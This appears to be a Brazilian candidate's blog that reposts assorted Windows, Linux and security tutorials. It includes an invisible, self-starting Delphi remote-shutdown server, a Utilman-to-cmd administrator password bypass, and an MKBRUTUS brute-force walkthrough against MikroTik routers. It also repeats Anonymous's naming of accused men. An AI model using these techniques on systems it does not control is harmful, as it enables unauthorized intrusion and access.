Mr Claytonet 20666 – O Vereador Digital CiberAtivista e Motociclista

Mr Claytonet 20666

Mr Claytonet 20666 – O Vereador Digital CiberAtivista e Motociclista
http;//mrclaytonet.vereador.site
Pelo progresso de nossa cidade chega de ser ultrapassado por outras cidades mineiras em desenvolvimento, chega de atraso. Sou Barbacenense a vida toda e nunca vejo nossa cidade progredir ta na hora de ter alguem que realmente não tem medo de lutar pelo progresso e o povo na camara municipal de Barbacena essa pessoa sou eu Mr Claytonet 20666 – O Vereador Digital CiberAtivista e Motociclista.
http://mrclaytonet.vereador.site
Assista este video:https://www.facebook.com/mrclaytonet/videos/1400996586582682/?hc_location=ufi

Porque escolhi o numero 20666?
Por causa do Route 66 MC 🙂

Delphi: Como criar um gerenciador para sua rede

Para criarmos um programa que “gerencie” a nossa rede, seja tanto em caso como no trabalho, temos que criar dois programas: um programa servidor, que ficará nas máquinas que queremos controlar; e um programa cliente, que irá rodar na máquina que queremos usar para controlar os outros computadores.

Primeiramente, devemos criar o programa servidor. Nele colocaremos os componentes ClientSocket (Internet) e NMMsgServ (FastNet). Logo após iremos clicar no menu Project/View Source. Nos será mostrado o código base da aplicação. Devemos colocar o seguinte comando após o begin:

Application.ShowMainForm:=False;

Isso serve para que quando a aplicação seja iniciada, ela não mostre o form principal, ficando invisível ao usuário que estará utilizando o computador. Depois, devemos mudar a propriedade Port do componente NMMsgServ para a porta que você quiser, ou deixar com está (6711). Você deve mudar se existir outro programa usando esta porta ou um firewall bloqueando-a. No meu caso, deixei como 6711.

Agora, no evento OnMSG, devemos colocar o que o programa deve fazer quando receber determinada mensagem. Nesse exemplo, ao receber a mensagem “desligar”, ele irá desligar o computador. Colocarei o comando que é usado para desligar o Windows 98, mas você pode perfeitamente colocar aquela procedure que server para desligar qualquer Windows, só não coloco aqui porque ela é muito grande.

if sMsg = “desligar” then
begin
WinExec(“C:\Windows\rundll32.exe user.exe,exitwindows”,sw_hide);
end;

Ou seja, quando a mensagem “desligar” for enviada para o programa ele irá desligar o Windows 98. Você pode fazer isso e colocar um else depois e fazer com que o programa aceite outros comandos, como por exemplo:

if sMsg = “desligar” then
begin
WinExec(“C:\Windows\rundll32.exe user.exe,exitwindows”,sw_hide);
end
else
if sMsg = “monitor” then
begin
DesligaMonitor(True);
end;

Então ele irá desligar o monitor quando receber a mensagem “monitor”. Claro que do jeito que está neste exemplo, a procedure DesligaMonitor deve estar declarada antes.

Depois de colocar todas as suas funções e procedures, você pode colocar no evento OnCreate do form, um procedure que coloque seu programa no registro para iniciar junto com o Windows ou pode colocar ele como uma tarefa agendada do Windows, para que ele inicie com o Windows.

Agora, temos que criar o programa cliente, para que possamos gerenciar nossos computadores. Crie uma nova aplicação, com os componentes ClientSocket (Internet) e NMMsg (FastNet). Não esqueça de mudar a porta para a que você configurou no servidor. Se você não mudou no servidor, também não precisa mudar no cliente, pois já vai estar com 6711. Agora, coloque um Edit, um Label e um Button. No Caption do Label, coloque “Host” e no Caption do Button coloque “Conectar”. No botão Conectar, coloque o seguinte código:

procedure TForm1.Button1Click(Sender: TObject);
var
comp:string;
begin
comp:=Edit1.Text;
NMMsg1.Host:=comp;
try
NMMsg1.Connect;
ShowMessage(“Conectado.”);
except
ShowMessage(“Erro ao Conectar.”);
end;
end;

Para funcionar, você deve colocar o IP ou o nome de Host do computador que quer controlar e depois clicar em “Conectar”. Se a conexão for possível, irá aparecer uma mensagem dizendo “Conectado”, caso contrário irá dar erro. Agora estou conectado e daí? Agora, vamos colocar um outro botão e alterar o seu Caption para “Desligar”. No código do botão, coloque:

if NMMsg1.Connected=True then
NMMsg1.Disconnect;
NMMsg1.PostIt(“desligar”);
NMMsg1.Connect;

Ou seja, quando você conectar e clicar em “desligar”, o computador a que você está conectado irá desligar. Podemos colocar outro botão com o código e trocar o “desligar” por “monitor”, então o monitor do computador seria desligado.

Outra coisa interessante é que podemos fazer um cliente mais aperfeiçoado, por exemplo, que mande estes comandos para uma faixa de IPs e assim, desligar vários computadores ou desligar os monitores de todos eles. Isso é interessante em empresas ou até mesmo em casa quando se quer enconomizar um pouco de energia e configurar o programa para que mande o comando de desligar o monitor para todos os computadores na rede ao meio-dia, para economizar na energia gasta por eles e configurar para que no fim no expediente (as 7:00 por exemplo), ele mande o comando de desligar o computador para os PCs da rede, evitando que algum fique ligado e que alguém tenha que ver se todos estão desligados, poupando energia e esforços.

Logo SDCX

Como recuperar o boot (MBR) do Windows 7

Quando um sistema operacional é instalado após o Windows, o novo sistema pode sobrescrever os arquivos de inicialização do SO da Microsoft. Distribuições Linux, por exemplo, podem instalar o GRUB na MBR, para que seja possível um dual boot entre o Windows e o Linux, considerando que o gerenciador de boot padrão do Windows não suporta outros sistemas operacionais sem o uso de gambiarras.

Mas, e se eu quiser remover o Linux do computador? A operação seria fácil: utiliza-se um editor de partições, como o EASEUS Partition Master, o conhecido Partition Magic ou o próprio editor do Windows, e então basta deletar as partições do Linux. O problema vem quando você tenta iniciar o Windows novamente. A máquina simplesmente não vai bootar, acusando um “GRUB loading error”.

Na época do Windows XP, era relativamente fácil recuperar o boot: inicie o CD de instalação, tecle R para entrar no console de recuperação, selecione a instalação do Windows que deseja recuperar e rode fixboot e fixmbr. Mas, no caso do Windows 7, esses dois “comandos mágicos” não funcionam mais. A Microsoft resolveu colocar, no DVD de instalação do Windows 7, um utilitário de “Correção de inicialização”, que nem sempre funcionará (e, dessa vez, não funcionou na minha máquina). Quando ele não funcionar, o que fazer? Simples! Aqui vai um passo a passo detalhado de como recuperar a inicialização do Windows 7:

1. Inicie o DVD de instalação do Windows 7, selecione o idioma, formato de hora e layout de teclado de acordo com suas preferências:

Início do assistente de instalação

2. Na próxima tela, clique na opção Reparar o computador:

Clique na opção reparar o computador.

3. O assistente de recuperação buscará por instalações existentes do Windows 7. Depois de concluída a busca, selecione a instalação desejada e clique em Avançar:

Procurando por instalações do Windows...

Selecione o SO e clique em Avançar.

4. Clique em Prompt de comando. Uma janela será aberta:

Clique em Prompt de comando.

5. Digite o comando bootsect /nt60 ALL /force /mbr e dê Enter. Espere o Windows processar tudo. Depois, basta fechar a janela e reiniciar o micro. Pronto! O programa bootsect.exe forçará (/force) uma sobrescrita do MBR (/mbr) de todas as partições (ALL) com um código compatível com o Windows 7 (/nt60).

Digite o comando e dê Enter.

Extra: segundo Claytonet, uma maneira mais “XP-like” de fazer isso seria usando os comandos BootRec.exe /fixboot e BootRec.exe /fixmbr. Se você não quiser digitar o comando enorme acima, vale a pena tentar.

Fonte guiadopc.com.br

Esqueceu a senha de Administrador do Windows 7?

Esqueceu a senha de Administrador do Windows? Saiba trocar

Descubra como mudar a senha da conta Administrador (Foto: reprodução/Edivaldo Brito)Descubra como mudar a senha da conta Administrador

É importante lembrar que o que será mostrado nesse tutorial deve ser usado unicamente para a modificação de senha. Além disso, apesar de ser focado no Windows 7, o procedimento a seguir pode muito bem ser feito em versões anteriores ou mais atuais do sistema.

Passo 1. Inicialize o computador usando o disco de instalação do Windows. Quando aparecer a mensagem “Press any key to boot from CD or DVD..” ou “Pressione qualquer tecla para iniciar a partir do CD ou DVD..”,  pressione rapidamente qualquer tecla para o sistema iniciar pela mídia de instalação do Windows;

Pressionando uma tecla para iniciar pela mídia de instalação (Foto: Reprodução/Edivaldo Brito) (Foto: Pressionando uma tecla para iniciar pela mídia de instalação (Foto: Reprodução/Edivaldo Brito))Pressionando uma tecla para iniciar pela mídia de instalação

Passo 2. Na primeira tela, clique na opção “Meu idioma é português (Brasil)” ou outra língua que você queira usar;

Escolhendo o idioma a ser usado pelo instalador (Foto: Reprodução/Edivaldo Brito)Escolhendo o idioma a ser usado pelo instalador

Passo 3. Em seguida, escolha as opções de localização (idioma, formatos e layout de teclado). Depois, clique no botão “Avançar”;

Escolhendo algumas opções de localização do Windows 7 (Foto: Reprodução/Edivaldo Brito)Escolhendo algumas opções de localização do Windows 7

Passo 4. Na próxima tela, apenas clique na opção “Reparar o computador”;

Iniciando a reparação do Windows (Foto: Reprodução/Edivaldo Brito)Iniciando a reparação do Windows

Passo 5. Aguarde o instalador localizar as informações. Quando a tela “System Recovery Options” estiver disponível, clique no botão “Load Drivers”. Na pequena tela que aparece, clique no botão “OK”, para continuar o processo;

Utilizando a opção Load Drivers para acessar os arquivos do Windows (Foto: Reprodução/Edivaldo Brito)Utilizando a opção “Load Drivers” para acessar os arquivos do Windows

Passo 6. Na janela “Abrir”, vá até a pasta /Windows/System32/ e procure pelo aplicativo Utilman. Ao encontrá-lo, clique nele e pressione a tecla F2. Mude o nome do aplicativo para Utilman2 e tecle enter para confirmar;

Renomeando o aplicativo Utilman (Foto: Reprodução/Edivaldo Brito)Renomeando o aplicativo Utilman
Passo 7. A seguir, procure pelo programa Cmd. Ao localizá-lo, clique nele e pressione a tecla F2. Mude o nome do aplicativo para Utilman e tecle enter para confirmar;
Renomeando o aplicativo Cmd (Foto: Reprodução/Edivaldo Brito)Renomeando o aplicativo Cmd

Passo 8. Depois disso, apenas reinicie o computador e deixe o sistema iniciar sem usar o disco de instalação (por precaução, retire o disco da unidade, assim que começara reiniciar);

Passo 9. Caso a conta Administrador não apareça na tela de login, isso significa que ela está desativada. Para resolver isso, clique no ícone azul e circular, que fica no canto inferior esquerdo da tela;

Tela de login do Windows sem a conta Administrador (Foto: Reprodução/Edivaldo Brito)Tela de login do Windows sem a conta Administrador

Passo 10. Será exibida a tela do Prompt de comando com privilégios de administrador. Nessa tela, digite o comando <code>net user Administrador /active:yes</code> e tecle enter;

Ativando a conta Administrador (Foto: Reprodução/Edivaldo Brito)Ativando a conta Administrador

Passo 11. Para visualizar o resultado da mudança, clique no ícone de desligamento e depois na opção “Reiniciar”;

Reiniciando o Windows (Foto: Reprodução/Edivaldo Brito)Reiniciando o Windows 

Passo 12. Com a conta Administrador na tela, clique no ícone que fica no canto inferior esquerdo para Abrir o Prompt de comando;

Tela de login com a conta de Administrador (Foto: Reprodução/Edivaldo Brito)Tela de login com a conta de Administrador 

Passo 13. Na tela do Prompt de comando, digite o comando <code>net user Administrador novasenha</code> (substitua novasenha pela senha que você quer usar) e tecle enter. Feche a janela para voltar para a tela de login;

Mudando a senha da conta Administrador (Foto: Reprodução/Edivaldo Brito)Mudando a senha da conta Administrador

Pronto! A partir desse momento você já pode acessar usando a conta Administrador e a nova senha. Aproveite e vá para a pasta /Windows/System32/ e desfaça o sexto e o sétimo passo, para não deixar seu sistema vulnerável.

Anonymous divulga dados de estupradores de menina no Rio de Janeiro

Anonymous

Além das milhares de mensagens em apoio à jovem vítima de estupro coletivo na Zona Oeste do Rio de Janeiro no penúltimo sábado (21), agora o grupo de hackers Anonymous mobilizou uma campanha para buscar e expor os nomes dos 33 homens que participaram do crime. Em uma mensagem no Pastebin, serviço que permite publicar fragmentos de textos por um período ou por tempo indeterminado, o AnonOpsBrazil anunciou que vai divulgar dados de todos os envolvidos na barbárie que chocou o país nesta semana. Segundo os hackers, as informações serão postadas conforme o grupo identificar os criminosos e somente depois que o Ministério Público receber uma denúncia formal pelos policiais que estão investigando o caso. Um dos nomes divulgados pelo grupo é o de Raphael Asssis Duarte Belo, de 41 anos. Ele é o rapaz que apareceu fazendo uma selfie ao lado do corpo da adolescente de 16 anos e que foi amplamente compartilhado nas redes sociais na última terça-feira (24). Entre os dados publicados estão o nome, a idade e o estado civil dos acusados. “Estamos com mais dados em relação a ele, mas, esses dados serão entregue para as autoridades na ajuda pra localizar o estuprador. Sim, tomamos toda cautela para confirmar a identidade dele”, comentaram os hackers no comunicado, reforçando a afirmação de que tomaram cuidado para não expor nenhuma pessoa inocente. Além de Raphael, a polícia já identificou outros três homens e decretou a prisão preventiva dos quatro.

São eles Lucas Perdomo Duarte Santos, de 20 anos, com quem a menina tinha um relacionamento há três anos; Marcelo Miranda da Cruz Correa, de 18 anos; e Michel Brazil da Silva, de 20.

Veja abaixo a carta divulgada pelos hackers do Anonymous Brasil: “‘Estupradores não são doentes: são filhos saudáveis do patriarcado.’ A sociedade e o machismo impregnado nela agem muitas vezes de maneira silenciosa. Pessoas banalizam o tempo inteiro e acabam por aceitar sua naturalizacão, costumeiramente atribuindo a culpa às vítimas das opressões. Uma sociedade doente, gera pessoas doentes, assim como o caso do Rafael, que divulgou e achou graça da desgraça e covardia extrema a qual cometeu com uma jovem, ainda por cima menor de idade, junto com mais cerca de 30 homens. A exposição desta figura é muito importante para que se possa facilitar a sua localização junto às autoridades competentes, para que possam dessa maneira localizar ainda os demais envolvidos nessa barbárie.Não há, infelizmente, justiça que repare a dor e o trauma sofridos, porém, há a urgente necessidade de que indivíduos como estes não continuem soltos junto à sociedade. Pedimos que compartilhem para que possamos dessa maneira localizar e, quem sabe dessa maneira, possamos assistir ao mínimo de justiça possível dentro de uma sociedade que se despreocupa com a criação de monstros como estes. Estamos com mais dados em relação a ele, mas, esses dados serão entregue para as autoridades na ajuda pra localizar o estuprador. Sim, tomamos toda cautela para confirmar a identidade dele.”

Fontes: Anonymous Brasil (Facebook), Pastebin via Catraca Livre

 

Como criar seu próprio servidor de arquivos em casa

Guardar seus arquivos de forma segura nunca foi tão fácil. Quem não gosta de armazenar seus dados com métodos tradicionais (pendrives, CDs, DVDs e HDs portáteis) pode muito bem usufruir de uma enorme variedade de serviços de armazenamento na nuvem como Dropbox, Google Drive e SkyDrive.
Contudo, digamos que você quer mais, muito mais. Não quer depender de servidores terceirizados, que podem muito bem apresentar problemas e sumir com seus documentos confidenciais em questão de pouquíssimos minutos. Embora seja pouco provável que os gigantescos datacenters da Microsoft ou da Google apresentem problemas, os mais neuróticos sempre mantêm essa possibilidade em mente.
Sendo assim, que tal montar seu próprio servidor de arquivos? Além de ser fácil e rápido, o procedimento é bastante barato, visto que você pode usar peças de PCs antigos que você não utilize mais (ou comprá-las em lojas de artigos usados). Além de armazenar de forma mais segura e privada os seus dados importantes, você também pode usar seu servidor para hospedar sites (economizando aquela graninha que você gastava no seu host). O Mr Claytonet ensina a você como fazer tudo isso em apenas sete passos simples! Confira.

(Fonte da imagem: Reprodução/Baixando Wallpapers)

1) Monte o hardware
Você se lembra daquele computador antigo que você não usa mais e que está acumulando pó desde o ano passado? Hora de revivê-lo e dar um novo trabalho para o bom velhinho. Caso você seja menos apegado e já tenha se livrado da sua máquina anterior, o jeito é montar um PC especialmente para o servidor adquirindo algumas peças que podem ser facilmente encontradas em lojas de artigos de informática. Dar uma conferida em e-commerces de usados também é uma boa pedida (sim, estamos falando do Mercado Livre). Basicamente, você vai precisar de:
Uma placa-mãe (não precisa ser um modelo muito recente);
Um processador de pelo menos 2 GHz ;
No mínimo 512 MB de memória RAM;
Um disco rígido da quantia que você desejar. Que tal 1 TB?
Fazendo uma rápida pesquisa na internet, é possível realizar uma cotação bastante precisa dos gastos desse servidor. Uma placa-mãe razoável gira em torno de R$ 199; um pente de 512 MB de memória RAM pode ser encontrado facilmente por cerca de R$ 80. Caso esteja com o orçamento apertado, opte por um Intel Celeron (cerca de R$ 100) na hora de comprar o processador. Se estiver com um pouquinho mais de grana para investir, opte por um Intel Dual Core E3300 (entre R$ 149 e R$ 199).
Por fim, chegamos ao item mais importante: o disco rígido. Um bom HD Seagate de 1 TB e 7200 RPM pode ser encontrado por pelo menos R$ 220. Se 500 GBs foram o suficiente para você, basta reservar R$ 150 por um drive da mesma marca. Quanto gastamos ao todo? Cerca de R$ 700.

(Fonte da imagem: Reprodução/Wikimedia)

2) Instale Linux
Não importa se você é um fã da Microsoft e não consegue se desapegar do clássico sistema operacional Windows: é necessário instalar o Linux para fazer seu servidor funcionar corretamente. Recomendamos que opte pelas distribuições Ubuntu ou Xubuntu. Ambas são completamente gratuitas e razoavelmente leves, não ocupando muito espaço em seu precioso disco rígido.
Instale a ISO gravando-a em um CD/DVD ou através de um pendrive bootável – clique aqui para aprender como fazê-lo, caso ainda não saiba. Importante: para os próximos passos deste tutorial, considere que utilizamos o Ubuntu 12.04 (um dos mais populares) para descrever as ações que você fará. Instalamos o SO em português.

(Fonte da imagem: Reprodução/HiTrend)

3) Limpe o sistema operacional
Qualquer distro Linux vem repleta de softwares adicionais que devem ser desinstalados antes que você prossiga. Utilize o Synaptic (gerenciador de pacotes também incluso nas distribuições) para desinstalar programas como AbiWord, OpenOffice/LibreOffice, Thunderbird, Gaim, GIMP, Firefox, Rhythmbox etc.
Em seguida, cheque se o sistema operacional não possui atualizações disponíveis. Se houver, baixe e instale todas por questões de segurança, garantindo a estabilidade do seu servidor. Por fim, desative o bloqueio de tela (através do menu Configurações do sistema > Brilho e bloqueio).
4) Configure o compartilhamento de arquivos
Tudo pronto, hora de iniciar as configurações e todo o trabalho pesado. Antes de tudo, instale o Samba, o programa que fará seu computador atuar como servidor e permitir o compartilhamento de arquivos em rede. Você pode consegui-lo através do próprio Synaptic (pesquisando novas aplicações e marcando-o para instalação) ou pela Central de Programas do Ubuntu. O app também está disponível no Baixaki.

(Fonte da imagem: Reprodução/iMasters)

Abra o terminal (Painel de controle > Terminal ou hotkey Ctrl+Alt+T) e digite sudo su para entrar no modo root. Será necessário reinserir a sua senha. Entre no diretório de instalação do Samba digitando cd /etc/samba. Escreva nano smb.conf e aperte Enter para iniciar o processo de configuração.
Apague todo o texto do documento (segure as teclas Ctrl+K até deletar tudo) e cole/digite o texto que pode ser encontrado neste link (substituindo “Name” e “Server Name” com o nome de usuário e nome da máquina). Salve o documento (Ctrl+O) e feche-o (Ctrl+X). É necessário especificar uma senha para acessar o Samba; para isto, digite o comando sudo smbpasswd -a. Por fim, reinicie os processos do programa, escrevendo sudo restart smbd e sudo restart nmbd.


5) Adicionando capacidade FTP
Abra o terminal outra vez (novamente: Painel de controle > Terminal ou hotkey Ctrl+Alt+T) e ganhe acesso root de novo (digitando sudo su e inserindo sua senha do SO). Escreva o comando sudo apt-get install proftpd para instalar o software ProFTPD. Quando você for questionado sobre o tipo de servidor que deseja configurar, escolha a opção “Standalone”.
Mude para o diretório de instalação com a mensagem cd /etc/proftpd/. Configure-o digitando o comando sudo nano /etc/proftpd/proftpd.conf. Substitua todo o conteúdo do arquivo que se abre pelo código que pode ser encontrado neste link.
Salve as configurações (Ctrl+O e em seguida Ctrl+X) e reinicie o servidor, inserindo o comando /etc/init.d/proftpd restart.


6) Configure o acesso Shell (SSH)
Ainda no terminal e em modo root, instale o OpenSSH (apt-get install openssh-server) e o VNC Server (sudo apt-get install vnc4server). Configure uma senha para este último aplicativo (digite vncpasswd e insira duas vezes uma senha de 6 caracteres). Crie um comando de login personalizado digitando sudo nano /usr/local/bin/sharex11vnc. Um novo arquivo será aberto e você deve colar/digitar o seguinte conteúdo dentro dele:
#!/bin/sh
x11vnc -nap -bg -many -rfbauth ~/.vnc/passwd -desktop “VNC ${USER}@${HOSTNAME}” \
|grep -Eo “[0-9]{4}”>~/.vnc/port
Calma, ainda não acabou! Defina os direitos do usuário através do comando sudo chmod 755 /usr/local/bin/sharex11vnc. Feche o terminal e permita que o script do VNC Server recém-criado seja iniciado junto ao Linux: percorra o caminho Painel de Controle > Aplicativos de Sessão e clique no botão “Adicionar”. Escreva sharex11vnc nos dois primeiros campos da janela que se abre e dê um “Ok”.
Por fim, ative o login automático de sua conta no Ubuntu (percorrendo o caminho Aplicações > Configurações > Contas de Usuário e marcando a caixa de seleção “Iniciar sessão automaticamente”).


7) Divirta-se!
Finalmente, seu servidor está pronto, com todos os softwares configurados e login automático ativado! Retire todos os componentes inúteis da máquina (mouse, teclado, monitor e até mesmo o leitor/gravador de CD e DVD) e plugue o cabo de internet (não é recomendado utilizar conexão WiFi).
Para se conectar ao seu servidor, você pode usar diversos programas como o PuTTy ou o FileZilla. Na maioria das vezes, tudo o que você precisa fazer é definir o endereço IP do servidor (você deve conferir essa informação antes a partir do PC com Linux), informar a porta (5900) e o destino (localhost:5900).
Lembre-se também de que você pode instalar complementos à vontade de acordo com sua necessidade, como TorrentFlux, Apache, MySQL e phpMyAdmin.

FONTE(S): INTAC

MKBRUTUS – Força Bruta em MikroTik e dispositivos com RouterOS

MKBRUTUS – Força Bruta em MikroTik e dispositivos com RouterOS

BRUTUS – Brute Force para MikroTik e dispositivos com RouterOS

O MKBRUTUS é uma ferramenta desenvolvida em Python 3 que realiza ataques de força bruta em sistemas (baseados em dicionário) contra RouterOS (ver. 3.x ou superior), que têm a porta 8728/TCP aberto.

Veja o ataque na pratica:
01 Passo

Se gostou da nossa iniciativa comente, curta ou compartilhe! Esse estímulo é muito importante para a nossa equipe e reflete diretamente na possibilidade de trazermos mais conteúdos que você venha a gostar!

Verifique a versão atual do python em seguida realiza a instalação da versão 3

root@kali:~# python –version (Exibe a versão do Python)

root@kali:~# apt-get install python3 (Realiza a instalação do Python 3)

MKBRUTUS – Força Bruta em MikroTik e dispositivos com RouterOS

02 Passo

Execute o comando de verificação da versão do Python novamente e observe que a versão não mudou mas a instalação da versão 3 foi realizada com sucesso.

root@kali:~# python –version (Exibe a versão do Python)

MKBRUTUS – Força Bruta em MikroTik e dispositivos com RouterOS

03 Passo

Realize o download do projeto mkbrutus

root@kali:~# git clone https://github.com/mkbrutusproject/mkbrutus

MKBRUTUS – Força Bruta em MikroTik e dispositivos com RouterOS

04 Passo

Altere as permissões do diretório mkbrutus e liste o conteúdo do diretório.

root@kali:~# chmod -R 755 mkbrutus/

root@kali:~# cd mkbrutus/

root@kali:~/mkbrutus# ls -l

MKBRUTUS – Força Bruta em MikroTik e dispositivos com RouterOS

05 Passo

Altere as permissões do diretório mkbrutus e liste o conteúdo do diretório.

root@kali:~/mkbrutus# python3 mkbrutus.py -h

-h : Help (Ajuda)

MKBRUTUS – Força Bruta em MikroTik e dispositivos com RouterOS

06 Passo

São apresentadas todas as opções que a ferramenta mkbrutus disponibiliza.

MKBRUTUS – Força Bruta em MikroTik e dispositivos com RouterOS

07 Passo

Crie um arquivo de senhas ou realize o download de uma lista nos sites:

Lista: wiki.skullsecurity.org/Passwords
Lista: wordlist.sourceforge.net

root@kali:~/mkbrutus# cat senhas.txt

 

Conteúdo do arquivo senhas.txt

MKBRUTUS – Força Bruta em MikroTik e dispositivos com RouterOS

08 Passo

Realize o ataque no equipamento utilizando os seguintes parâmetros.

root@kali:~/mkbrutus# python3 mkbrutus.py -t 192.168.0.1 -d senhas.txt

  • mkbrutus.py : Ferramenta de Brute Force
  • 192.168.0.1 : IP do Roteador MikroTik
  • senhas.txt : Arquivo de Senhas(Wordlist)

O ataque é realizado com sucesso e o usuário e a senha são revelados:

Usuário: admin
Senha: P@ssw0rd

MKBRUTUS – Força Bruta em MikroTik e dispositivos com RouterOS

O MKBRUTUS é uma ferramenta desenvolvida em Python 3 que realiza ataques de força bruta em sistemas (baseados em dicionário) contra RouterOS (ver. 3.x ou superior), que têm a porta 8728/TCP aberto.

Desenvolvedores:

Ramiro Caire  | ramiro.caire@gmail.com | Twitter: @rcaire
Federico Massa | fgmassa@vanguardsec.com | Twitter: @fgmassa

Projeto: github.com/mkbrutusproject/mkbrutus

Fonte: 100security

Quebrando criptografia através das Paredes

Quebrando criptografia através das Paredes

Quebrando criptografia através das Paredes

Este artigo demonstra ao público em geral que existem formas de ataque que podem ser feitas aos algoritmos criptográficos que fogem do aspecto matemático, puro e simples.

O artigo, escrito originalmente por WILLIAM BUCHANAN da Napier University, demonstra de forma inequívoca que, algoritmos supostamente seguros podem, de fato, serem atacado por métodos não convencionais – mas científicos porcerto – numa linguagem simples e acessível a todos.

Se gostou da nossa iniciativa comente, curta ou compartilhe! Esse estímulo é muito importante para a nossa equipe e reflete diretamente na possibilidade de trazermos mais conteúdos que você venha a gostar!

Abaixo, segue uma tradução livre feita por mim deste artigo (respeitando ao máximo o conteúdo original), preservando também as imagens que Prof.Buchanan pôs

Ao final, todos os links que embasam o artigo.


Agora a Criptografia pode ser Quebrada através das Paredes

A quebra de chaves de criptografia tem envolvido frequentemente métodos de força bruta, ou falhas de segmentação em sua implementação. Há, porém, o interesse crescente em ataques físicos indiretos  (nota: no original, Physical Side-Channel Attacks), onde há um vazamento não-intencional de informações da criptografia, tais como de radiação eletromagnética, consumo de energia, flutuações de tensão elétrica e variações do mesmo som e térmicas.

Poucas empresas atualmente protegem seus dispositivos contra ataques indiretos, especialmente se se provassem dispendiosos, e exigem extensos testes com equipamentos complexos.

Dispositivos também estão se tornando mais rápidos, e, naturalmente deles, são propensos a emitir uma quantidade crescente de emissões de rádio e eletromagnética (EM). Um processador de 2GHz, por exemplo, está rodando por volta da mesma frequência que nossos sinais de Wi-Fi (2.4 GHz), e muitas vezes os chips não são protegidos contra emissões de ondas de rádio que são um subproduto natural da operação rápida do dispositivo. Nessas altas freqüências, é geralmente difícil impedir emissões de EM para fios nas proximidades e em outros circuitos.

Ataques por Canais Laterais

Tem havido trabalhos sobre a quebra do algoritmo RSA com métodos acústicos, juntamente com variações eletromagnéticas e de tensão. Agora, os pesquisadores tomaram um significativo passo à frente, conforme documento “ECDH Key-Extraction via Low-Bandwidth Electromagnetic Attacks on PCs” (Ataques de Extração de chaves ECDH via Eletromagnetismo de Baixa-Frequência em PC’s).

Dentro deste documento, os autores descrevem a quebra do ECDH (Curva Elíptica Diffie-Hellman), que é um dos mais populares métodos de troca de chaves e é muitas vezes usado ao se conectar a sites como Microsoft Live, Google e Facebook.

No trabalho eles atacam o algoritmo de criptografia de chave pública ECDH e medem as mudanças eletromagnéticas. Este ataque usa um método “texto codificado escolhido” (nota: Choosen Ciphertext Attack, um método bastante conhecido há décadas), e uma técnica de análise de tempo-freqüência de sinal, de forma a quebrar a chave. Isso revela a chave de descriptografia em poucos segundos, vinda de uma antena em outra sala.

ECDH é agora um método popular, e é basicamente o método de troca de chaves Diffie-Hellman com o uso de métodos de Curva Elíptica:

(Nota: veja aqui uma explicação sobre Curva Elíptica)

Análise de Tensão

O trabalho de modulação em trilhas dos chips é bem documentado, para descobrimento das chaves de criptografia, onde a segurança e a proteção da chave é reduzida. Também houve trabalho sobre um “cold boot” onde os chips de memória são “congelados”, mantendo seus estados de informação/bit:

Análise Diferencial de Alimentação em cartões SIM

Até agora, todos pensamos que cartões SIM estavam seguros da maioria dos tipos de ataque.

Mas Prof. Yu-Yu, da Shanghai Jiao Tong University, tem mostrado agora que os cartões SIM 3G/4G, usando AES de 128 bits, podem ser quebrados – portanto, o pesadelo de clonagem de cartão SIM poderia se tornar realidade (vide este link).

 O acesso às chaves de criptografia SIM é um foco importante para a aplicação da Lei, e destacou-se no início do ano quando os agentes de certa Autoridade foram suspeitos de roubar bilhões de chaves de criptografia do fabricante holandês de cartões Gemalto.

Essas chaves permitiriam o acesso a mensagens de voz e dados nos telefones.

Em sua apresentação de Black Hat USA 2015 nesta semana, Prof. Yu-Yu descreveu como um método de análise diferencial de alimentação/tensão que recupera chaves de criptografia de cartões SIM, o que permite serem então clonados. No geral, demora de 10 a 40 minutos para recuperar a chave e seu método foi bem-sucedido em oito dos fabricantes mais populares de cartão SIM.

Ele usa, basicamente, um osciloscópio para capturar as mudanças de energia e um analisador de protocolo MP300-SC2, juntamente com um PC para analisar a criptografia. O trabalho usa Análise Diferencial de Alimentação (DPA – Differential Power Analysis). Com Análise de Alimentação Simples (SPA – Simple Power Analysis) monitoramos a tensão consumida pelo processador e isto pode dar dicas sobre o conteúdo dos seus registradores e BUSes.

A urna eletrônica Brasileira

A urna eletrônica é um microcomputador de uso específico para eleições.

Ela apresenta as seguintes características: resistência, pequenas dimensões, baixo peso, autonomia de energia e recursos de segurança.

Sistema Operacional da urna eletrônica

Até 2006, a urna eletrônica utilizava o sistema operacional VirtuOS e Windows CE que possibilitavam o compartilhamento do processador por diferentes processos que são realizados simultaneamente. Os modelos de urna 1996 a 2000 rodavam o sistema operacional VirtuOS.Os demais modelos de urna: 2002, 2004 e 2006 rodavam o sistema operacional Windows CE.

 

MODELO

 

SISTEMA OPERACIONAL                     PROCESSADOR

UE 96 Virtuos 386- 25MHZ
UE 98 Virtuos Cyrix GX 133
UE 2000 Virtuos Cyrix GX 166
UE 2002 Windows CE Cyrix GX 166
UE 2004 Windows CE Cyrix GX 200
UE 2006 Windows CE Processador 433 Mhz – 128MB DDR

 

A partir das Eleições de 2008, o TSE adotou uma única plataforma, baseada no software livre Linux, que é usado até os dias atuais. Essa troca trouxe três grandes vantagens. A primeira delas é a economia, já que o governo não terá mais que adquirir as licenças dos antigos sistemas proprietários. A segunda vantagem diz respeito à transparência do processo, pois é um mecanismo aberto em que todo código-fonte está disponível ao público e pode ser auditado livremente. E em terceiro lugar, vem a segurança, já que o Linux é um sistema reconhecidamente mais seguro.

Além disso, pode-se destacar que a padronização do uso do software livre Linux, em todos os modelos de urna, traz a vantagem de se gerenciar melhor as contingências durante as Eleições.

 

 Sistema de Segurança e Sistemas Eleitorais

Existem dois importantes sistemas relacionados à urna eletrônica, que são utilizados nos computadores da  justiça  Eleitoral.  São  eles:  o  Subsistema de  Instalação  –  SIS  e  o  Segurança Gerenciador de Dados e Aplicativos da Urna Eletrônica – GEDAI. O SIS tem por sua vez a grande função de  controlar  o  acesso.  Este  sistema  permite a  criação  de  um  trabalho  homogêneo e  seguro possibilitando o controle do processo de inseminação de informações nas urnas e, também, garante que sistemas eleitorais, como o GEDAI, somente sejam instalados nos equipamentos da Justiça Eleitoral.

Já o GEDAI é o sistema responsável por transferir dados, das seções eleitorais como a tabela de eleitores de cada seção, fotos dos candidatos, bem como o Sistema Operacional UE-nux (Linux da urna) entre outros, que são transferidos para um flash card (Memória Flash – figura abaixo) de carga e futuramente inseridos nas urnas eletrônicas. É ainda o GEDAI o programa responsável pela gravação das  memórias de  resultados  que  introduzem na Urna todos os programas utilizados durante as eleições.

